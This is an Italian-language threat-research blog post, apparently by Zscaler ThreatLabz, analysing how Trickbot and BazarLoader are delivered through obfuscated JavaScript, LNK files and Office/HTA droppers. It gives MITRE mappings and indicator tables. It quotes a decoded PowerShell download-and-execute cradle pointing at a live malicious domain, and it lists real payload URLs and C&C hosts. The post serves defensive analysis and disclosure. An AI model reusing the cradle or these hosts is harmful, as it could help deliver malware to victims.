Informazioni utili e ricerca

Le nuove campagne Trickbot e BazarLoader utilizzano più vettori di distribuzione

Le nuove campagne Trickbot e BazarLoader utilizzano più vettori di distribuzione

Il team di ricerca  Zscaler ThreatLabz monitora ogni giorno migliaia di file tenendo traccia di minacce nuove e pervasive, che includono uno dei più importanti trojan bancari degli ultimi cinque anni: Trickbot. Trickbot è attivo dal 2016 ed è collegato a un gran numero di campagne dannose che hanno coinvolto il mining di bitcoin e il furto di informazioni bancarie, di informazioni di identificazione personale (PII) e di credenziali. BazarLoader è uno spinoff di questo trojan, sviluppato dagli stessi autori. Entrambi sono estremamente pericolosi, in quanto sono facilmente modificabili e in grado di fornire carichi utili a più fasi, oltre a prendere il controllo completo dei computer.

ThreatLabz ha scoperto che gli operatori di Trickbot, nelle recenti campagne di attacco, stanno impiegando nuovi approcci per distribuire carichi utili. I campioni di malware che abbiamo analizzato erano molto ben realizzati ed efficacemente nascosti, con capacità di eludere le sandbox. In questo post del blog, mostreremo l'analisi dei diversi vettori di distribuzione utilizzati da Trickbot e BazarLoader.

Punti chiave:

1. I file script e LNK hanno aggiunto tecniche di evasione per sfruttare le minacce malware.

2. L'offuscamento multilivello viene utilizzato per impedire l'analisi dei file JS e LNK.

3. Un allegato di Office rilascia un file HTA con frammenti di funzioni HTML e javascript.

4. I domini appena registrati vengono utilizzati per fornire minacce.

Trickbot sta ampliando la relativa gamma di tipi di file per la distribuzione di malware

Nelle campagne precedenti, i carichi utili di Trickbot venivano generalmente sganciati come allegati dannosi ai file di Microsoft Office. Nell'ultimo mese, abbiamo visto che i malware utilizzano ampiamente anche i file javascript, insieme a una serie di altri formati di file, come mostrato nelle seguenti tabelle:

 Trickbot complessivamente bloccati nella sandbox

Fig. 1: Trickbot bloccato con Zscaler Cloud Sandbox

Bazar complessivamente bloccati nella sandbox

Fig. 2: BazarLoader bloccato con Zscaler Cloud Sandbox

In questo blog esamineremo la catena di attacco per diversi vettori di distribuzione, tra cui: 

  • Trickbot che si diffonde attraverso i file di script
  • Trickbot che si diffonde attraverso i file LNK
  • BazarLoader che si diffonde attraverso gli allegati di Office

Trickbot che si diffonde attraverso i file di script

Trickbot riesce a infiltrarsi utilizzando le e-mail di spam con allegati javascript dannosi, come i seguenti:  

Spam

Fig. 3: allegato di e-mail di spam

In questo caso, il file Javascript [5B606A5495A55F2BD8559778A620F21B] ha tre livelli di offuscamento che vengono utilizzati principalmente per eludere e bypassare gli ambienti di sandboxing. Di seguito è riportata l'istantanea del primo livello offuscato:

Primo livello offuscato

Fig. 4: primo livello di offuscamento in Javascript

Oltre a fare uno sforzo estremo per rendere i file Javascript altamente offuscati, gli autori di malware hanno anche aggiunto elevati quantitativi di junk code alla fine, per rendere più difficile il debug. Il junk code consiste in stringhe offuscate, generate casualmente che non giocano alcun ruolo nel codice dannoso.

Junk code per complicare l'analisi

Fig. 5: junk code per complicare l'analisi

Con l'utilizzo della funzione eval() abbiamo reso non offuscato il secondo livello, in cui il codice dannoso è incorporato in un altro junk code. Dopo aver rimosso questo livello di junk code, la funzione eval ()viene nuovamente utilizzata per recuperare il livello finale di codice. Possiamo notare che gli autori di Trickbot hanno utilizzato il metodo setTimeout (), che valuta un'espressione dopo 967 millisecondi per ritardare l'esecuzione nella sandbox. In questo modo il malware elude gli ambienti di sandboxing.

Secondo livello

Fig. 6: secondo livello di offuscamento in Javascript

Nell'istantanea di cui sopra, possiamo vedere il metodo di sostituzione implementato nel codice, in cui le stringhe "hdBDJ"e "tSJVh" vengono rimosse rispettivamente dalle variabili "YHPhEFtKjqbCmAZ"e "kVYJOrLSqvdAWnaGTX" per ottenere la stringa finale.

Livello finale

Fig. 7: livello finale

Il Javascript dannoso esegue cmd.exe come processo figlio, quindi cmd.exe esegue powershell.exe per scaricare Trickbot come carico utile. 

Flusso di esecuzione: 

Wscript.exe ->cmd.exe->powershell.exe

Powershell.exe viene incorporato con il comando codificato base64 e dopo decodificato, con il comando seguente:

IEX (New-Object Net.Webclient).downloadstring(https://jolantagraban{.}pl/log/57843441668980/dll/assistant{.}php")

JS Sandbox

Fig. 8: rilevamento di Zscaler Cloud Sandbox di downloader di Javascript

Trickbot che si diffonde attraverso i file LNK

Le estensioni Windows LNK (LNK) sono generalmente viste dagli utenti come scorciatoie e spesso abbiamo osservato criminali informatici che utilizzano file LNK per scaricare file dannosi come Trickbot. Il Trickbot nasconde il codice nella sezione argomento, sotto la sezione delle proprietà del file LNK. L'autore del malware ha aggiunto spazi extra nel codice dannoso per tentare di rendere più difficile per i ricercatori il debug del codice. Abbiamo visto questa tecnica utilizzata in precedenza nella campagna Emotet del 2018, in cui sono stati utilizzati allegati di Office dannosi.

LNK finale

Fig. 9: codice incorporato nella sezione delle proprietà dell'LNK

Scaricamento di Trickbot:

  1. L'LNK scarica il file da 45.148.121.227/images/readytunes.png utilizzando un argomento silenzioso, in modo che l'utente non possa visualizzare messaggi di errore o azioni in corso.
  2. Dopo lo scaricamento, il malware salva il file nella cartella Temp con il nome application1_form.pdf.
  3. Infine, il file viene rinominato da application1_form.pdf a support.exe ed eseguito. In questo caso, support.exe è Trickbot.

LNK Sandbox

Fig. 10: rilevamento di Zscaler Cloud Sandbox di downloader di LNK

BazarLoader che si diffonde attraverso gli allegati di Office

Questa è una delle altre tecniche utilizzate in TA551 APT, ossia Shathak. I documenti dannosi di Office rilasciano il file HTA in "C\ProgramData\sda.HTA". Questo file HTA contiene HTML e vbscript progettati per recuperare una DLL dannosa per infettare un host Windows vulnerabile con BazarLoader. 

Una volta abilitata la macro, viene eseguito il processo mshta.exe per scaricare un carico utile. In passato, questa campagna è stata osservata con BazarLoader e Trickbot.

Fig. 11: catena di attacco di file DOC per scaricare BazarLoader

I dati codificati di base64 vengono implementati nel tag HTML <div>, utilizzato in seguito con JavaScript.

HTA_HTML

Fig. 12: rilascio di file HTA: base64 dannoso codificato nella sezione HTML <div>

Di seguito è riportata l'istantanea dei dati di decodifica di base64, dove è possibile vedere lo scaricamento del carico utile e il salvataggio come friendIFriend.jpg sul computer della vittima:

HTA decodificato

Fig. 13: rilascio del file HTA: decodifica dei dati di base64

Reti: C&C per scaricare BazarLoader

Reti

Fig. 14: invio della richiesta di scaricamento di BazarLoader

Abbiamo inoltre osservato nuovi domini registrati (NRD) creati appositamente per distribuire questi carichi di lavoro, utilizzando un 'ladro' di informazioni distribuito tramite posta indesiderata e abbinato a un allegato dannoso di Microsoft Office.

NRD

Fig. 15: dominio appena registrato

DOC Sandbox

Fig. 16: rilevamento di Zscaler Cloud Sandbox del Downloader dannoso di Office

JS.Downloader.Trickbot

Win32.Backdoor.BazarLoader

VBA.Downloader.BazarLoader

MITRE ATT&CK

 

T5190

Raccolta di informazioni sulla rete della vittima

T1189

Compromesso drive-by

T1082

Rilevamento delle informazioni di sistema

T1140

Rendere chiari/decodificare file o informazioni

T1564

Occultamento di artefatti

T1027

File o informazioni offuscate

 

Indicatori di compromissione

 

Md5

Nome file

Tipo di file

B79AA1E30CD460B573114793CABDAFEB

100.js

JS

AB0BC0DDAB99FD245C8808D2984541FB

4821.js

JS

192D054C18EB592E85EBF6DE4334FA4D

4014.js

JS

21064644ED167754CF3B0C853C056F54

7776.js

JS

3B71E166590CD12D6254F7F8BB497F5A

7770.js

JS

5B606A5495A55F2BD8559778A620F21B

68.js

JS

BA89D7FC5C4A30868EA060D526DBCF56

Subcontractor Reviews (Sep 2021).lnk

LNK

 

Md5

Nome file

Tipo di file

C7298C4B0AF3279942B2FF630999E746

a087650f65f087341d07ea07aa89531624ad8c1671bc17751d3986e503bfb76.bin.sample.gz

DOC

3F06A786F1D4EA3402A3A23E61279931

-

DOC

 

URL associati:

jolantagraban.pl/log/57843441668980/dll/assistant.php

blomsterhuset-villaflora.dk/assistant.php

d15k2d11r6t6rl.cloudfront.net/public/users/beefree

C&C:

Dominio

Carico utile

jolantagraban.pl

Trickbot

glareestradad.com

BazarLoader

francopublicg.com

BazarLoader

 

Resta aggiornato su novità e suggerimenti nel mondo della trasformazione digitale.

Inviando il modulo, accetti la nostra informativa sulla privacy.